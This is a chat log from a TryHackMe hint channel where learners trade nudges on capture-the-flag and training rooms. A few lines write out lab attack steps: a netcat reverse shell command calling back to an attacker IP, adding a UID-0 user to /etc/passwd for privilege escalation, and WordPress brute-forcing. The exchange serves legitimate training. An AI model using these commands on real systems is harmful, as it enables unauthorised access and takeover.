#room-hints

You never used a script that does give you some useful information in the past ?

i do use a few lol, but mostly manual :/

Try LinEnum.sh, don't search too much it's just one line, still related to what I said earlier

i was looking at that just now

😉

When you create a volatility profile, does it have to be made on the target machine, or would another machine with an installation of that same OS and version suffice? If a different machine is acceptable, is it problematic to use a VM?

hello , for the nmap room, Task 3, I need to run a nmap or all the answers are possible without linux

I am doing this room: https://tryhackme.com/room/introtoresearch i have everything completed except question :
If a password hash starts with $6$, what format is it (Unix variant)?
I know thats sha512 but the format ... its salt&encrypt ? Tried all possible combinations but it keeps haunting me 😦

@true gazelle https://askubuntu.com/questions/350208/what-does-2-dev-null-mean 😉
@dusty pebble Any thing else? is /5 was a mistake? (it stands for the space bettwen flag 5)

@drowsy needle You're on the right track, but it's a specific subset with a longer name :)

@dense latch uh, it's a room about nmap -- you're gonna need to run it...
That said, there is a windows exe for it, but linux will serve you better in the long run

hello , for the nmap room, Task 3, I need to run a nmap or all the answers are possible without linux
@dense latch without linux you can use namp / zenmap (gui) on windows !

but yes you need to run it

But don't use WSL

alias nmap=nmap.exe

I edited the message bc obviously i need to run it

^^'

yes, you need to run it

Don't shoot me , i promise i'll get better

🔫

I got a real one :C the emoji, not.. irl ;;, don't be confused

Life is much easier with a Linux VM (Kali/Parrot preferably)

I hope you don't have RL emojis

hahaha

I do everything on windows tbh, running wsl (kali) and windows tools

ma1ware got [REDACTED]

I love WSL, but it's a pain for network related stuff

wsl networking isn't great and Windows sucks

When WSL2 is gonna be out officialy, networking tools may work fine

well you don't run windows for the sake of windows :p

When's that gonna be?

May 2020? I am not sure.. it is still in insider builds for now

Or they may not. I'm not holding out hope.

niiice

https://devblogs.microsoft.com/commandline/wsl2-will-be-generally-available-in-windows-10-version-2004/

I'm gonna repeat my question, because I think we got a little sidetracked.

When you create a volatility profile, does it have to be made on the target machine, or would another machine with an installation of that same OS and version suffice? If a different machine is acceptable, is it problematic to use a VM?
I'm gonna leave for a bit. Feel free to @ or PM me on this subject :)

@viral crane

just get the insider preview. its stable. well at least for me :p

Hmm, after running nmap my answer for the number of open ports under 1000 still wrong ...

just get the insider preview. its stable. well at least for me :p
@drowsy needle yes maybe, but i had way too many issues related to insiders build before.. also it’s coming in May i believe so I am not worried

@true gazelle Specify the dir just after the find

IRRHOM====== can someone tell me encryption type ?

Have you tried to google it?

As that would be my first port of call.

😉

got it

@viral crane mind if I PM you? Maybe I did an other PE for YOTR, it was very easy and I did not even used a scripted 🙂

Yeah sure!

@white pike I'd be interested to know if you've found an unintended 🙂

hi guys, linux challenges task4 #6
locate and retrieve flag26
i cant find flag 26 with find command, what can i do

@white salmon can you please give me a hint

Sorry @fossil cosmos I've not done that yet, if you bare with us though I'm sure somebody will have and will help as soon as they can.

ok thanks

if anyone has done that, please pm me or hive me a hint

Muirland gave me a hint yesterday but I couldn't figure it out. I'm stuck on the ssh pass part in madness

10 hours later

i managed to root it

Ey!!

@ashen fox You remember I said think outside the box?

I meant literally

hmmm.

thanks 👌

I'll take a break from it and do year of the rabbit I think.

is the supposed solution linked with something else?

What do you mean chev?

pm?

@viral crane thanks for the tool ^^ i'll use it in the future. took me a while to actually understand the output of it

You are welcome! 😉

Yeah, @inland onyx, wonderful room!
loved it

Any hint for Year of the Rabbit room? I'm stuck a feel hours. I'm not sure if I missed anything, first part

@solar sage The entire first part is very CTF

@solar sage what point are you at?

Remember that

Until you get a shell, it's CTF

^^ good hint

@glossy basin inside xD

so you got shell?

yup

The real problem is priv escala.

ohh :)

@stuck fractal Honestly, even after the shell it's CTF. Privesc I suppose a bit more realistic

@solar sage Did you do the rooms I pointed you at?

Do some more Oracle's rooms and solve it

Yes @inland onyx

One of them will show you exactly what to do

so what's the problem then? it's pretty obvious after that

I probably missed something. I'll rest for a while and try again, thank you, guys!

I feel dumb , but cant find an answer for
this question: What is the name of the technique that "Search Engines" use to retrieve this information about websites? from googledorking room. I did all the question, and all of them are pretty easy.

I am sure that this one is very easy too, but I'm stuck. Tried few variants from google, and read the text 3-4 times but no luck 🙁

It's in there, read the thing again

ah, okay. Thanks

i feel really stupid asking this, but has anyone got any hints for https://tryhackme.com/room/zthlinux , the final challenge, i just can't seem to work out how to esclate to root

@fringe scroll Don't feel stupid for asking questions. Give me a moment to look at it.

Very last question, the Bonus Challenge?

First off, who are you currently logged in as? Just so I know the frame of reference.

(whoami)

@static kiln im in as shiba4 but can log in as shiba1-4 and noot

@fringe scroll Look for files belonging to each user. One should stand out.

is it the ll file in shiba4

If you need any more than a hint, please check my beloved write-up, then ask in #room-help 🙂

It is not

ah ok thanks ill take another look

@inland onyx thank you i've managed to find it, i was looking at your walkthrough, whats the purpose of -type f 2>>/dev/null , i get it eliminates some of the results but what are the conditions for that, apologies

@fringe scroll -type f Limits it to files
2>>/dev/null discards errors

Or more specifically, redirects errors (2) to /dev/null -- which you can think of as being the bottomless pit in Linux

Anything that goes in there ceases to exist

yea i did some searching and worked out what dev/null was and that was what confused me

thanks again i really appreciate it

Np

Hello friends, doing the Linux challenges room. I'm a little stuck on task 3 #6 - "flag 16 lies in another system mount". I've found proc/mounts but not sure if I'm on the right track. A little hint would be appreciated thanks

Got it nvm lok

:^) good job!

One of them will show you exactly what to do
@inland onyx I tried both, inside ssh and another shell. I think I'm missing something, I can't understand. I went through the steps 2-3 times to identify what I missed

@solar sage If you've done those rooms you'll see that one of them contains the exact process
It can be repeated inside the challenge room with the same results

Albeit a different binary to exploit

hey guys, can i get a hint on linux challenges task5 #5 Flag 33 is located where your personal $PATH's are stored.

cant find anything at the time

and hint would be really helpful

@fossil cosmos Google where your shell sets your bath

There's a couple files

i foind it, thanks

found*

can i ask a question about rabbit?
is the privesc path something to do with ||SUID files?||

@tardy drum It is not

Although there's a nice wee rabbit hole there

can i get a little nudge for rabbit?

You may

(*ﾟ ｰﾟ)(⊙﹏⊙) ★🌕 ★

@inland onyx do you mind giving a hint for rabbit?

I can give you a nudge with it. DM with where you are with it, given it's only been out for a day

Is there a room that dives deeper into grep as the find room does? I obviously searched for 'grep' already 🙂

i dont understand flag16 in linux challenges

may someone give me a hint?

I'm trying to complete the Sudo Security Bypass but everytime I run the commands that are shows, I get a message that tells me that the current user is not allowed to execute sudo commands

@jaunty ember The syntax there is very exact. Try harder

🤦‍♂️ How could I not see this without rubber duckying..

thnx for the hint

Hey everyone in "WebAppSec 101" I had a problem about the Command Injection

@white salmon so a system mount is the act of associating a storage device to a particular location in the directory tree. Basically you're looking for another media device somewhere in the box

That being said, I have no idea how you're supposed to figure out flag17 in the same challenge

I have enumerated the system and found the binary that is supposed to be exploited to elevate my privs but "abnormal service" didn't understand that i guess
any hints

i gotta ask i hate asking this but is bruteforceing needed for theyearoftherabbit

@graceful sun what are you referring to?

@graceful sun shouldn't do?

sorry, initial foothold

got first two hints but stuck now

@graceful sun You can dm me.

hey guys please help me in the cod caper room
i m stucked at task5 question3

@mighty talon the SSH key doesn't work so it gives you alice's credentials to log in in her account, once done that you need to find in her directories for flag17

im in the Retro CTF (day 13 from advent cyber) i wanna know if i'm in the right path

i found the hidden directory on the web server and i'm trying to find either a file upload or a login page

otherwise i have no idea what to do

@stuck fractal any ideas?

@green prism delete answer

And read the posts

sorry

tmux #7: what did our session name default to when we created one without name?

Try it and find out

i keep finding answers when i post here, w.e

@white salmon yeah, that one definitely falls under rule 13

ive been trying to find in google and that but forgot about doing it in the terminal lol

hello every one , im at Linux Challenge
Task 2 flag#6 , "
"Grep" through flag 6 and find the flag. The first 2 characters of the flag is c9.
"

i tried to run
||find / c9 | grep c9|| but nothing came out

You're search for a file called c9 and then looking through those results for c9 @true gazelle

Does ||find / c9|| is searching for the file (c9) and the grep command as is says grep c9 so i dont get where i got it wrong

i will try harder... if there is any more hints thank you

i also get a feedback from the terminal which says "find: ‘c9’: No such file or directory"

Hi everybody

i am solving mr.robot machine, i found flag-1 and then i am searching flag-2 , could you give me any hint? I am using|| wpscan|| tool and i am trying|| bruteforce to wps-login|| but nothing

@true gazelle that's not the name of the file

in yaroftherabbit i got the password list but none are working am i getting rolled again? lol

@graceful sun can confirm, one does work

ok thanks

Idk if you broke the formatting though

right thats what im thinking. i just did strings then copy paste

they all lined up just fine

Hello rp: Metasploit do have any tasks after task 3 or not?

Please answer

there are tasks 4-6 after 3, @meager pebble

@glossy basin i mean are there any questions to answer or just some theory part

in where?

Bcoz I don't see any questions

there are questions in 4-6

refresh the page

Like in 3 there are 13

Like in 3 there are 13
@meager pebble Refresh, fixed it. This wont occur from next week as we're changing our task functionality

@normal peak so what should i do know it says you have completed the room successfully

But i just did only 3 tasks

can you leave the room and re-join it please

Options in the top right, options -> leave room

K trying

Thanks

It worked

In Brainstorm room, I get the chatserver.exe but cant run on Windows XP and Windows 7

What should I do

ohh I should have download the executable file on binary mode

any hints how to upgrade to root in year of the rabbit room

Take a look at some of my other rooms 🙂

hahahahahah i love this hint

Im having some difficulty on the base 2, binary (not octal - lol) question too. It's not obvious. I came across lb in a maths website but nothing I've read seems to work.

@rain heart The whole point of it is that it isn't obvious

It's designed to make you research

Hey can i search for files with specific permission with "find "? im very new to thi stuff

@naive umbra yea

@naive umbra use -perm flag

There's a pretty good room on the find command

if i only want to search for everyone persmission do l leave the first xx7 emepty or somethin

not quite sure what do u think by that

lets assume a file has 775

permissions

i just to search the for the last permission which is for everyone

Use -005 -- that should find it

It's searching for at least world read-execute

@inland onyx ty @solid patrol

if u want to get more familiar with find command there is good room about it

and one more thing search for binaries with root privs?

which room

https://tryhackme.com/room/thefindcommand

wow thanks

check https://blog.tryhackme.com/going-from-zero-to-hero/ for paths for rooms

it will help a lot

anyone do the bonux objective on the learn linux room got a lifeline to thorw?

hi i am solving retro machine, could anyone give me any hint?

Hello, I'm currently on the ToolsRus room, and I'm having trouble exploiting the machine via metasploit

@silent linden Look for files belonging to each user

@stone meadow No idea where you're stuck at

@inland onyx for the bonus??

@empty nimbus What's the problem? (sounds more like a #room-help thing)

@silent linden Yes

@inland onyx ty

Is the exploit ||exploit/multi/http/tomcat_jsp_upload_bypass|| the right path or am I completely in the wrong direction ?

I don't have notes for that room, but I think you're looking for a different exploit

Because, I set up the RHOSTS, RPORT, LHOST and I still get a "Failed to upload the payload" when I try to run it

Mhm

From memory it's a different exploit

did u set LHOST to your tryhackme ip

Yes, it's the right IP

Okay, thank you @inland onyx, maybe I should look for arbitrary file uploads instead of RCE ?

Looks right

Yeah, it was another exploit 😉

for retro I don't think I'm supposed to be || WPScanning the hidden directory right? ||

ok i found a hidden file on another user but i cant swtich to that user

lol

@inland onyx i found hidden direcory

@inland onyx you sly rogue 😉 Got it. I think THM has taught me more about semantics than it has about hacking (lol!)

i still have no idea where im going wrong hahahah

i hate wordpress

Should i use hydra or wpscan for wordpress bruteforce attack?

What is your suggestion?

hey guys

in question 12 from pentest questionaire

can anyone give me a hint?

"You do it horizontally and laterally."

Think about what you might do once you've got initial access to a machine @lone abyss

@inland onyx Hey yo, could you give me hint about retro machine? I found ||retro ||directory and i am stuck here

Directory Traversal

but it's not correct

@lone abyss That's the first thing you'd look to do after getting RCE?...

@inland onyx and i am performing|| bruteforce attack Wade,wade users and rockyou.txt for passwords.||

@stone meadow Then you've not enumerated enough. Keep looking -- first step should always be see what's on offer, before trying your own steps to break in

omg

but I had already tried it and it said incorrect

@inland onyx i found it bro ^^ i am in the dashboard but i don't like scenario because it is not realistic ^^

Correct, yes -- just deleting it to avoid the answer 🙂

@stone meadow You would be amazed at how often people do things like that...

@inland onyx are u serious?

Completely

The weakest link is always going to be the human link

That's frequently exaggerated for CTFs, that is true

But by and large, more often than not it's going to be human error that breaks something open

@inland onyx yes you are right

And given the number of people who still use "password" as their password? You can bet that there will be scenarios of people putting their password somewhere publicly accessible as a reminder

@inland onyx thank you man

My discord pass is nootnoot1

Might not even be a lie

👀

I bet it's nootnoot2

:DD

guys im kinda stuck at advent of cyber task 7 mission 2 how im supposed to find the password?

Ive added new user by escalation to the 'passwd' file. Why is it enough without setting the password on the 'shadow' file?

hello, can some one give a little hint how to solve task 5 (about Jim secret answer) in OWASP Juice Shop room? thanks

Nm, thanks

anyone crack the hash on tony the tiger? Im having issues with it. Can someone dm me?

i got the pw list for yearoftherabbit but none are working can someone check my format

I don't recall there being any cracking in yearoftherabbit

There's a bruteforce

Are you throwing it at SSH @graceful sun?

FTP it says ftp

Then yeah, you're doing something wrong there

there was? I don't remember that..

i did strings and it looked fine it all lined up :/

oh, i remember the "bruteforce" part now

can someone check my format of the wordlist i was givin to use, the format of it i heard that could be why its not working

Sure, Pm it :)

Thank you!

I have 3 images in the Tony room, none of which yield any steg or exif results. Is there a factor I'm missing?

Yeah

You're thinking too deep 🙂

Think simpler

How simple? Source-code simple?

simpler :p

where do i go from here ? doing this in sqlmap "--tables -D users" does not give me anything..

you gotta provide some context dude xD

On the actual page?

im after a username

The Cod Caper task 4 question 1

what room task and all that :)

@white salmon ah, no you were doing the right thing. Just do it real simple :3

Ah, now I'm thinking of cat

haha, that was a coincidence, but that.. might actually work

It'll be really confusing though...

Got it

well, it's gotta fit the creator, right? :D

next time, use strings :p

Fair point...

;)

Babe we diiiiiid it 😄

after few hours ofc

even got the password, how proud do i feel ? VERY proud

😛

And you didn't even need help :p

@white salmon if you get a chance do you mind DMing me what you mean by Alice's key "didn't work". I've been trying to figure out .ssh and downloading her key and I've been kinda lost. :/

@mighty talon That's broken

Just use her password

Ah, that explains why none of the walkthroughs explain why they just have her username and password.

Good to know.

It's in the task description..

Right, so is it broken in the sense that her private key permissions aren't set up properly? Or is it that the box is working incorrectly? That was my question. If its the fact that her permissions aren't set up properly that's the part I'm getting confused about. If the box is broken and it just gives you her username and password somewhere that's a different story.

Disregard, I just saw it.

Nothing like typing it all out so you can think it through so you can check if what you said was true :p

Yep, had to go back and read everything again lol. That's what I get for trying to move too fast through it.

https://en.wikipedia.org/wiki/Rubber_duck_debugging

Yeah, mine is a little pewter wizard that I scream at sometimes. Poor little guy.

hahaha

Any reason why port 8000 of the machine of WebGOAT is closed?

I would expect it to be open, in order to play around with it

VPN is working properly and I can ping the tomghost room, but all ports are filtered even using "sudo nmap -Pn -sC -sV -p- <boxip>"

I cant connect to Brainstorm any idea?

Remote system type is Windows_NT.
ftp> dir
501 Server cannot accept argument.
ftp: bind: Address already in use

In passive mode,

Connected to 10.10.20.113.
220 Microsoft FTP Service
Name (10.10.20.113:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
227 Entering Passive Mode (10,10,20,113,192,15).

Is it firewall issue?

Hi, hope you are all well. im having trouble with intro to python, is there anyone who can take a look at my code please?

I'm doing the Room tony the tiger the hint is : Tony's a pretty shy guy, he rarely takes photos of himself. So anything he posts must mean something! Does it mean i have to look for the flag inside the pictures on that site ?

task 4

It would appear that way, yes

It's really really basic tho, so don't overthink it

I did exiftool, but no luck there

Even more basic

Gee-weez.. hmm interessting

so basic that it's actually a bit hard

I mean

You can assume that

I would call looking in the image info is more basic, but its not that 😄

must be more basic!

does it mean i have to download the image, or is that more basic ?:D

can someone help me with the Retro room

I got user flag but I cant get root

you do have to download it, yes :p

I cant upload a shell, says there's no internet

@ornate narwhal lol in before it's just the image that needs to be looked at (like visually)

Ok, not that basic :3

You guys are confusing me even more 😄

gimee some more basic tips 😄

no more hints ? I was going so deep thinking about not basic, so now i cant get out of that depth 😄 help me out

think about this: What's the most basic way it could hide in that file?

tbh, i never was that guy who looked info in the pic.. so imo the most basic way is to look in image info.

did try finding info in google image search, thought that was basic, but had no luck

do you look for info in other files, though? :)

also, i can't help but notice that you said "the" pic. Afaik there are 3 pictures x)

I have one of tony and another of of kellogs

wait.. there's a picture of the chicken?

i dont see it

no, that was a question

i see only these two on that site

yeah, those were the two I got :3

And the answer is in one of those

There is another one lying around, but I haven't actually found a use for it

I thought you found a picture of Kellogg's other mascot by the same name

... wait.. that's tony as well?

.. no

.... oh 😦

It's Kelloggs!

ah...

I'm disappointed now

Common Linux Privesc Task 6 #3 ||I just change the command it gives me for [new] [123] copy paste it and it says its incorrect|| why?

@bitter crane

huh?

is that the picture i need to find ?

no

the one u posted

you have the right picture. It's one of those two

remember that discord probably scoffs the picture up so if you download it from discord, it may not give the right result

thr picture that i have are downloaded from the site itself

good good c:

but i cant think of the basics you guys are talking about

it's sometimes used on more complicated files, but it's a very basic approach non the less

it's sometimes used on more complicated files, but it's a very basic approach non the less
@bitter crane you mean like compiling them ? 😄

Right direction, but much simpler. Ever pulled data out of a binary?

Right direction, but much simpler. Ever pulled data out of a binary?
@bitter crane no

then you've got your work cut out c: Figure out how to extract readable data from a binary and other files that aren't fully readable! :D

so i change jpg to sh ?

bonus task: Figure out what file extensions do :p

(and how little relevance they have in linux)

eh, it's all the same. it's just what people idiomatically do

Common Linux Privesc Task 6 #3 ||I just change the command it gives me for [new] [123] ||copy paste it and it says its incorrect why?

Doesn't mean Linux will treat it any differently 😆

you guys went from basic to more cunfusion 😄

Sounds like you need hit hit the books ;)

Or just wikipedia

well, send me a link of wiki that would help me to solve this task 🙂

Have you done the researching room yet @ornate narwhal 🙂

Have you done the researching room yet @ornate narwhal 🙂
@inland onyx yes

forget about it, dont wanna waste too much time on it, will do it when i got more time. tell me other thing, when i try to connect to netcat, why does it connect and get back to my own shell ?

I use nc -lvp 4444 to start listening on my pc

and this in the run command on the website : nc 10.11.0.53 4444 –e /bin/bash

I get connection but it goes back to my own shell

This is for Tony?

yes

no

What "run" command on the website?..

its the cod caper

room

Ah, that makes more sense 🙂

Not a clue. I used a fifo myself

My guess is that it doesn't support -e

Not all versions of netcat do

oke let me try without it

same thin, connected and back to my shell

What command did you use?

nc 10.11.0.53 4444 /bin/bash

Then you're not telling it to execute at all...

You need -e or -c

But they're only supported by some versions of netcat

Hence me using a fifo

same thing with -c

Then you're going to need to find another shell

Hello, i've been doing the blue round and successfully connected to the remote machine

I have literally seen -e work for a ctf

Only once

and I found a flag but i have no idea how to download or open it :/

Do you know windows cmd? @left plank

more or less yeah

Then just use that to output the flag

okay

thank you

Telles me unable to initialize device PRN...

ok i got it Thank you 🙂

hi guys

i was wondering if i can get help with a room.

it is a beginners room about web fundamentals

it seems i cannot get the POST flag

basically i used: curl -X POST --data http://x.x.x.x /ctf/post

but whatever i put in after data seems to not work

any advice ?

Which task?

task5 mini CTF

the second one

POST task

i got the rest of them, but this one evades me. i know i am so close 🙂

I've done it by I can't remember it 😛

Bare with me I'll try have a look.

Have you curl'd the address?

yes i did

Using terminal?

yes

i thing i am missing after --data the right combination of characters...

i specified the folder also

but no effect

this is the hinti get: "cURL is probably the easiest way to do this, use -X POST and --data <whatever you want to send>"

cant get it to work 😦

Just going back through it now, 2 secs.

I can't remember but I have the answer if you need it.

thank you but i must do it on myself 🙂

thanks for your time also

how do i manually add a user to /etc/passwd? need for privilege scalation

sudo useradd username

its in common linux privesc task 6 #4

did you used openssl passwd -1 -salt [salt] [password]

yes

already have that but dk what to do with it

sudo adduser new:password hash:0:0:root:/root:/bin/bash

and password hash is the long line of characters that start with $1$new

says user7 isnt in the suddoers file

can i dm u better? so we dont bother this chat

okay

im getting [+] Command executed successfully on tony the tiger but get no output.

Hey guys, could someone gives me a hint about how to find the mcsysadmin’s password of the 7th question of the Advent of Cyber's 9th task?

have you looked where linux stores every password? @dusky cosmos

Im not in the sudoers file. "/

have you looked if theres a backup of that folder in the system? @dusky cosmos

I haven't done that yet... I'll try

ty

did it work?

no 😦

I found a bak file, but there is no important information about my issue

Year of the Rabbit. Any small hints for getting a shell? (not asking for a direct spoiler, just a directional path. I tried too many things already) Thanks in advance 🙂

@shrewd skiff intercept the requests in burp

You'll see something interesting

I did not focus on port 80 too much. Are you telling me to ? 🙂

Indeed I am

Thanks 🙂 hint taken

Is it just me or did the room just upgrade it self with a firewall

Uh

It doesn't have a firewall

Iirc

Atleast I didn't encounter one

room ran out of time, i restartet it.. did a nmap again and now i cant get ports

Oh

Yeah rooms take time to start up

Give it a few minutes

no no .. it is up

All 1000 scanned ports on 10.10.180.75 are filtered

Yeah

All the services might not be started up though

Expires

So just give it some time

45m 04s

Oh you've already been waiting 15 minutes

ill restart it

Yeah that's weird and not supposed to happen

Try resetting

nmap -sS -sC -sV 10.10.180.75
doing this without the --script vuln.. did that before.. so just wanted a quick re-review

It works now.

Will continue with the hint. Thanks

@white salmon I just need to be sure here. Are you telling me to look at the / get request? it looks pretty standard to my eyes. If not then i guess i gotta punch my head 🙂

There are other things to look at

😁

@white salmon That thing 🙂

I love the ocational rick rolled videos here and there

@white salmon This might be where i need a second hint. "other things to look at". Do you mean a different URL (already did a dirbuster scan). Also i know that default installations does usually have some sort of "easy access thing going on". My knowledge about apache2 Debian is not that large. I tried googling about it, and the funny part is that, i do remember watching some videos on Youtube during the final stage before sleep in my bed about default apache2 pages.

I dont want you to drop the bomb 🙂

Keep in mind this is a trolly room

So common things may have hidden secrets in them

That wouldn't be there usually

Thats my weakness im not good at trolly things

That's not really a weakness

You can't really get good at trolly things

You just have to be extra perceptive and check everything

I can tell you what i tried so far

Have you run a dirsearch

yes

And you've found the rickroll video

I got rick rolled 🙂

Your answer is in that folder

funny

So my initial wtf about that was true

oh wow

trolly it was

@white salmon I hope that the video dont start ... ever

its been loading for ages now.. maybe im lucky today!

@white salmon not really sure if Rick is a hint here haha

Rick?

Oh that rickroll video

i did access the funny url

You went down a rabbit hole

oh that lol

i almost cant ask my question here since i will spoil things

Put it in spoiler tags

||test||

thats a spoiler tag ?

Yeo

Yep

Ok sec

So i did access ||/sup3r_s3cret_fl4g/||

Mhm

Did you examine the get requests in burp

hey can I ask a question about the same room but at a different stage

Well yea, i did look at them several times

But i understand that there something

Did you examine the get requests in burp
@white salmon 😛

Don't spoil my beautiful Rick-rolls!

😁

@white salmon question?

yeah! love your room btw, just wondering if I should focus on privesc to access stuff in ||gwendoline||

haven't had much luck with suid bins so far

There's a lateral privesc first

hmm, ok thanks

@white salmon I have a feeling that its ||directory traversal||

It's not

My feelings just went away

@inland onyx || Any hints for Eli's creds?||

||esoteric languages||

lol

been looking at the same get request several times.. and it strikes me..... what a funny looking ||/WExYY2Cv-qU/|| url

Indeed

so i suspect i gotta look again for more trolly things 🙂

funny feelings about ||stego || comes to me

@white salmon ||Lenna ||is an interesting person

Not sure where to go from this point... also this is my first CTF room ever with all this "funny & weird setups".

Oh this was your first one

Yeah doing this first might have been a mistake

In fairness

It's a stereotypical ctf

I have yet to see a ctf hide anything in ||style.css||

But it's a CTF style of trick

I wouldn't do that in production

But fair point

I'd be tempted to hide a comment in that file

No one ever checks it

Yea it my first one. I usually pick rooms without CTF

(note ofc I wouldn't do that)

Pre-cise-ly 😁

I did of course solve minor CTF stuff like flag.txt

cat it and yea..

recommendations on a good steg tool for Kali?

Impossible to recommend

Stego tools can be very specific

stegoveritas is probably the best "do it all" tool

But it doesn't pick up on everything created by every tool

The absolutely evil @inland onyx used a really obscure stego tool in one of his rooms

That no other tool would pick up on

So you just kinda have to work with it on a case by case

Ill try a little of this and that on the image i found

🙂

Remember this is hints @shrewd skiff -- see if you can work through it yourself, and ask if you get really stuck 🙂

oh yea.. i got carried away.. i will delete my other comment

That's OK 😄

🙂

Thanks for the help. I found stuff. Gotta afk a bit now. 🙂

hmm, so I've spend the last hour looking at exploits for every suid binary on rabbit with no luck. Should I keep looking?

No, just read the message carefully

Thanks @feral kraken, can I ask, is it a reference to ||procmail||

No my friend

You will see the message, after ssh session

omg thank you so much, how did I not think of this before

congrats on 10th place btw on the challenge leaderboard

@feral kraken what message are you talking about? I also can't seem to find a way to do privesc

@spark mason he was referring to the welcome message you get when you ssh into eli

*motd

Ooooh I thought you guys were talking about || privesc from gwendoline to root||

Can anyone point me in the right direction please - I'm currently doing 'find' command and I'm having difficulty with this " Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)" I have so far ||find / -type f -perm /-w- -name "*.sh"||

@white salmon that, uh, isn't quite how that works

Oh?

It all looks good, other than the -perm argument

Ok, I'll re-read a bit.

I can see what you were thinking with that, and it was a good idea, but worth a re read 😄

🙂

@inland onyx || do i have to use CVE-2019-14287 in order to privesc to root? ||

That strikes me as a little more than a hint -- why not try it and see? 🙂

@inland onyx Can you give me another clue regarding that find command as I'm pulling out my hair, I've got it to ||-perm \g=w||

The backslash shouldn't be necessary (although you might need something there if I remember which question you're on)

@white salmon In the man page, search for ||-perm||

And I'm not sure about those letters

I'm on man now but it's not standing out, I'll try again 🙂

guys im having trouble with john
where do i put the salt
is it like this
salt:hash
or like this
hash:salt

How to know if firewall is been disabled?

How to know if firewall is been disabled?
@meager pebble firewall-config (If it is installed)

@ornate narwhal thanks

@royal jackal What room? Easier to understand what you mean by that

the last question from crackthehash room

@royal jackal Hashcat will do it

can i do it with john

thats the idea i dont want hash cat

Yes but not being open to using multiple tools will be your downfall

u dont get it i was dared to do it in john

or challenged

actually

by my friend midnight commander

his not really my friend

i dont know him irl

but u get the idea

i told him yea its possible in john

and i dont want him to tell me

"I TOLD YOU SO"

i hate being told

"I TOLD YOU SO"

So try harder

Find the format for sha1 hmac in john

--format=hmac-sha1

The salt is the secret key

No

I mean the hash format, not the format flag

yeah thats what im not finding

Google harder

i think john has poor documentation

@royal jackal Google harder, rule 13 http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats

Bet you it's the same for hmac md5 and hmac sha1

ahhh it worked it really is the same as hmac md5

but how was i suppose to know that hmac-md5 applys to hmac sha1

¯_(ツ)_/¯

things are just weird i guess

ahhh yes everything worked as planned thank you @stuck fractal

Can anyone tell me where I'm going wrong as I just can't seem to get it - find / -type f -perm g-w- -name ".sh I'm trying to Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)

I've googled and man'd it and I just can't seem to get it for some reason.

@white salmon g isn't others, is it?

UGO

I'm a f***ing idiot

All bleeding afternoon

Grrr

Also, if you put your text in `here` then it won't mess your formatting up

Thank you @stuck fractal

Can some one give me an hint about the 13° question of the 2° task of rp web scanning ("Finally, what if we'd like to use our plugins to run a series of standard tests against the target host?")?

Have you tried Google?

yes

It's not one I've yet done so can't help but I'm sure somebody will be able to comment.

@white salmon Privilegede escalate on "year of the rabbit". Tried a little of this and that. This is my first CTF but im not giving up. I came this far 🙂 Any hints?

https://tryhackme.com/hacktivities#MuirlandOracle

You'll learn what you need to know there ^^ 🙂

was that to me?

It was

Thanks ill look at it

Can anyone give me a hint on the reverse Engineering room task4? I've found the particular code related to the password in the crackme file and inputted what i thought the answer was but it still keeps shooting me down.

From the looks of the main function, it seems like it's looking at the ASCII value of local_2b (0x7a61), and then increasing that by 1 for each loop iteration and checking to see if it matches the first, second, then third character. But I've input 'abc' for the first three characters and it says incorrect answer. Driving me nuts that I can't interpret this correctly. Any hints?

Pastebin link to code I pulled from Ghidra https://pastebin.com/UVw7PNak

@jaunty bramble You sure there isn't a constant offset or something?

Hi, I might be stupid but I really don't know what it wants me to do at the end. "and if it's set equal to the current $USER environment variable."

I think I need to use "cat shiba2 | grep test1234 &&..."

Current $USER variable is "shiba2".

Thanks for your help/hint.

No @fiery orchid

Only thing you're doing is setting an environment variable called test1234

So with touch $test1234?

No

Touch just creates a file

Reread the $ task

aha I see, with export $test1234

I mean you're on the right track

but I still don't get it completely... do I need to set $test1234 variable equal to the $USER variable? with export $test1234=$USER

Yes

Thanks got it

How do we start entering text into our new Vim document? - I'm thinking it's ||insert|| but that doesn't seem to be the case. I've looked online and everything.

I realise I'm going to kick myself but any hints?

@white salmon Yes you'll kick yourself

That question is so dumb

How do you enter text once you're in insert mode

Think smol brain

I love that question though

Just be very literal

Like what are you litterally doing

Bugger me really...

Christ that's stupid.

@stuck fractal doesn't mean it isn't a dumb question

😁

@white salmon can you stream this? I want to see... (and help)

lol

It'd just be me hitting my head repeatedly against a keyboard.

well.. if you would be in insert mode.. it would help you answer your own question :p

I can honestly say after completing the VIM room I've still no urge to use it.

I mean you're nearly right

I can honestly say after completing the VIM room I've still no urge to use it.
@white salmon I'm sad... and sorry 😦

Just a question.. is nano supported on most (plain/newly installed) machines?

I can certainly see it's uses and parts of it I think is brilliant but (yes there is a but) I know it would drive me insane.

Yeah I think it is.

ok.. well.. vim normally isn't.. but vi is 😛 (and sometimes vi is just an alias for vim)

@white salmon Thank you my friend

You're on the right path

tbf it's better than all the 'how do i exit vim' questions stack overflow has 🙂

History will remember nano as the victor!

so when im playing the tony the tiger box and i execute the exploit im getting exploit completed but there is no out put of my command...

nano wins and vi bites the dust

Emacs.

Do you wanna see the world burn @bitter crane

I already broke your syntax

I win!

You should have seen the ytcracker stream

He went hard on my grammar

😂 😂 😂

yeah, well, you're being corrected by a dyslexic, so I wouldn't be surprised :p

I haven't touched emacs and if it's anything like Vim I don't think I will be.

Nano FTW.

I like you @white salmon

🙂

vim is awesome, however i understand it can be a challenge to get into. i'd reccomend the guide on THM for vim https://tryhackme.com/room/toolboxvim
it'll help you get started with it 🙂

"challenging to get in to" Its a program that suppose to edit files
why make it that complicated

who ever made vim is probably regretting it

I believe the creator is referring to how complex it seems

why make it complex if it does something simple

Exactly my point!

You my friend have just joined the nano squad @royal jackal

i was a nano person before i registered for college

The nano army only grows!

no doubt

Hey everyone, I'm stuck at the amazing ccradare2 room. It is brilliant. Though I have to say I'm one of those that just bash my head against the final exam. I think I'm not missing much but can't find a way to "do it"... Do you have any advice please? Some reading to do or something. I tried decompiling with Cutter or ghidra, following registers, checking the ADD that @white salmon mentioned, yet I'm still stuck. Thanks 😄

@white salmon do you know asm well?

Nope. I'm watching many YT videos of Live Overflow or r2, reading the re book and all, but I'm still at beginner level.

